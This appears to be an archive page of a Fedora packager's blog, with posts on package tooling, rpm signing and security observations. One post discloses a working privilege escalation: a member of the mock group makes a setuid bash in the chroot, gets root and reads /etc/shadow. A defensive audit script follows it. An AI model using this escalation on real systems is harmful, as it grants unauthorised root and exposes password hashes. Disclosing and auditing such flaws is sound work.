upstream release monitoring

July 16th, 2009 by till

Today I published the git repository of the tool I started to write to supply an upstream release monitoring service to Fedora. Some time ago Michał Bentkowski wrote a tool called FEVer to do this, but he became unresponsive and did not publish the full code of FEVer. Since I missed this service, I started to write a new tool that can provide the same service, which is currently called “cnucnu” for lack of a better name. It does not have any Bugzilla reporting features yet, but they will be added eventually. At the time of this posting, it only supports checking all packages that are listed on the Fedora wiki page of FEVer and testing regular expressions, to ease development of one for a new package.

preupgrade security fail

July 2nd, 2009 by till

I just wanted to try out preupgrade to update to Fedora 11, but then I was disappointed that it does not verify securely what it is downloading and installing onto my system. And even worse, this is not even announced by preupgrade. It is so strange, on the one hand all rpm packages are signed and even the algorithms used are updated, but on the other hand the signatures are not used. So please be aware that if you use preupgrade, it will not verify that the installed content came from Fedora.

BruCON Security Conference in Brussels

July 1st, 2009 by till

I just registered for BruCON, because the early bird tickets are only available for two more days. Will you come, too? It would be nice to meet some Fedorians there, but I guess I would have more luck at some generic FOSS conference.

becoming root with mock

May 27th, 2009 by till

I wonder how well known it is that installing mock and adding a user to the mock group means giving this user root access most of the time. I know the authors of mock now and also some people on fedora-devel, but did you know? In case you wonder how it works, here is one way to do this:

$ /usr/bin/mock --init -r fedora-10-i386
$ /usr/bin/mock --shell -r fedora-10-i386
mock-chroot> chmod u+s bin/bash
$ /var/lib/mock/fedora-10-i386/root/bin/bash -p
# cat /etc/shadow
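
An audit for the issue shown above, as an added example that is not part of the original post: it lists who is effectively in the mock group and which setuid/setgid files have appeared under the chroot directory since a baseline was recorded. The function names and the baseline file are assumptions made for this example.

```shell
#!/bin/sh
# Added audit sketch; function names and the baseline file are assumptions.

# Print every account in group $1: supplementary members (field 4 of the
# group file) plus accounts whose primary GID in the passwd file matches.
group_members() {
    grp=$1; group_file=${2:-/etc/group}; passwd_file=${3:-/etc/passwd}
    gid=$(awk -F: -v g="$grp" '$1 == g { print $3; exit }' "$group_file")
    [ -n "$gid" ] || return 0
    {
        awk -F: -v g="$grp" '$1 == g {
            n = split($4, m, ",")
            for (i = 1; i <= n; i++) if (m[i] != "") print m[i]
        }' "$group_file"
        awk -F: -v gid="$gid" '$4 == gid { print $1 }' "$passwd_file"
    } | sort -u
}

# Print setuid/setgid regular files below $1 (paths relative to $1) that
# are not listed in baseline file $2. Packages ship a few such files
# (su, passwd, ...), so the baseline should be recorded right after
# "mock --init"; anything that appears later was changed inside a chroot.
new_setid_files() {
    root=$1; baseline=${2:-/dev/null}
    (cd "$root" && find . -xdev -type f \( -perm -4000 -o -perm -2000 \) -print) |
        sort | grep -vxFf "$baseline" || true
}

# Typical use on a build host (not run here):
#   group_members mock
#   new_setid_files /var/lib/mock /root/mock-setid.baseline
```

Every account printed by group_members should be reviewed as if it had root on the host.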

rpmbuild in current directory

May 18th, 2009 by till

Since I started packaging, I was always annoyed by rpmbuild’s demand for its strange directory structure for input and output files. Therefore I wrote this little script to get an rpmbuild that uses the current directory for all these directories. Maybe there is one missing, because a recent rpm version now uses a BUILDROOT directory. Maybe one can define _buildrootdir for this, but I did not yet have any need for it.


$ cat rpmbuild-currentdir.sh
#! /bin/bash

# Point every rpmbuild input/output directory at the current directory.
/usr/bin/rpmbuild --define "_sourcedir ." --define "_rpmdir ." --define "_builddir ." --define "_srcrpmdir ." --define "_specdir ." "$@"

disable bluetooth on thinkpads on Fedora

December 29th, 2008 by till

Already on Fedora 8 the bluetooth disable button on my thinkpad was broken somehow. It works fine in grub, but iirc once udev is started, it stops working. Since I nearly never use bluetooth, this does not do much harm to me. But since Fedora 9, bluetooth is always enabled during boot, and then it sucks that I am not able to disable it again easily. Talking with an expert about this, he told me that bluetooth can easily be disabled with this command:

echo disable > /proc/acpi/ibm/bluetooth

I was also told that it is possible to use acpid to run this command when the key is pressed. Nevertheless I wonder why this button, which had been working out of the box since I bought the thinkpad, was broken. Asking on the hal mailing list did not get me any reply, so if you know anything helpful, please leave a comment. :-)

make force-tag opt-in

December 17th, 2008 by till

At the FESCo meeting on 2008-09-17 the removal of the force-tag make target was decided. But it was also decided to still allow changing cvs tags using

TAG_OPTS=-F make tag

If you want your force-tag target back, simply add this to your ~/.cvspkgsrc file (the first character of the second line should be a tab character):

force-tag: $(SPECFILE) $(COMMON_DIR)/branches
	@$(MAKE) tag TAG_OPTS="-F $(TAG_OPTS)"

To ease your life, you can also download this code from my fedorapeople space.

secure:

ssh fedorapeople.org cat /home/fedora/till/public_html/files/cvspkgsrc-force-tag.gmk >> .cvspkgsrc

insecure:

curl http://till.fedorapeople.org/files/cvspkgsrc-force-tag.gmk >> .cvspkgsrc

Don’t forget to check your .cvspkgsrc afterwards.

cached package review buglists

December 13th, 2008 by till

The Package Review SIG created some webpages that cache bugzilla queries of package review requests. The pages are currently updated every hour and are a lot faster to load than doing direct queries at bugzilla. This is not something new, but it would be nice if 719 of you readers would pick up a ticket from the unassigned list and perform a review. ;-)

Here are the lists:

Unassigned Review Requests, Review Requests in progress, Accepted Review Requests, Rejected Review Requests

rpm addsign with gpg agent

December 12th, 2008 by till

Unfortunately I am not yet able to use my gpg key to create working signed rpms. But during debugging this I had to sign lots of test rpms nevertheless and enter a new password every time. Luckily during the debugging it became clear how to make rpm use the gpg-agent instead of passing the password via a file descriptor to gpg.

Thanks go to Jeff Johnson for motivating me to do this and telling me, that it is ok to modify %__gpg_sign_cmd. And also to Panu Matilainen for backing this up. I normally have a strong aversion against modifying macros that begin with two underlines, but with this encouragement it is not that bad. ;-)

That’s enough talk, here comes the code:

I added this to my ~/.rpmmacros file:

%__gpg_check_password_cmd /bin/true
%__gpg_sign_cmd %{__gpg} gpg --batch --no-verbose --no-armor --use-agent --no-secmem-warning -u "%{_gpg_name}" -sbo %{__signature_filename} %{__plaintext_filename}

Now rpm will still ask for a password, but one can enter anything. If the gpg-agent needs a password to unlock a key, it will just fire up the pinentry command, which will then allow three password entry attempts by default. If entering an empty password for rpm is still too annoying for you, Aaron Hawley described how to use expect to provide a password to rpm.

come to the 25C3

December 12th, 2008 by till

Hello fellow Fedorians, I was so happy when I noticed that the 25C3 was added to the Fedora events page, to meet more of you in person. But now I checked who will be there and noticed that there is only one other attendee. I guess you all did not notice that there is an event page for The Congress, but you know now. :-) So please add yourself now! And don’t forget to join the GPG-keysigning event.